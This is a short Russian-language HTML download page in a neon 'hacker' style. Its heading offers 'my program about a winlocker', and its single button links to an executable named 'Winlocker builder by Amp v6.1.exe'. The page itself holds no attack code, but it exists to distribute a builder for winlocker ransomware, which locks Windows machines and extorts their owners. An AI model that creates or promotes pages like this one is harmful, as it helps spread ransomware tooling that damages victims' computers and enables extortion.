<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Скачать училку</title>
    <style>
        body {
            background-color: #0d0d0d;
            color: #00ffcc;
            font-family: 'Courier New', Courier, monospace;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            flex-direction: column;
        }

        h1 {
            font-size: 3rem;
            text-shadow: 0 0 10px #00ffcc, 0 0 20px #00ffcc;
            text-align: center;
        }

        p {
            font-size: 1.2rem;
            margin-bottom: 20px;
            text-align: center;
        }

        a {
            text-decoration: none;
            margin: 10px;
        }

        button {
            background-color: #1a1a1a;
            color: #00ffcc;
            border: 2px solid #00ffcc;
            padding: 15px 30px;
            font-size: 1.5rem;
            cursor: pointer;
            transition: all 0.3s ease;
            box-shadow: 0 0 10px #00ffcc, 0 0 20px #00ffcc;
        }

        button:hover {
            background-color: #00ffcc;
            color: #0d0d0d;
            box-shadow: 0 0 20px #00ffcc, 0 0 40px #00ffcc;
        }

        .button-container {
            display: flex;
            flex-direction: column;
            align-items: center;
        }
    </style>
</head>
<body>
    <div class="button-container">
        <h1>Скачать мою прогу про винлокер 🤫</h1>
        <p>Нажмите на кнопку ниже, чтобы скачать файл.</p>
        <a href="Winlocker builder by Amp v6.1.exe" download>
            <button>Скачать (.exe)</button>
        </a>
    </div>
</body>
</html>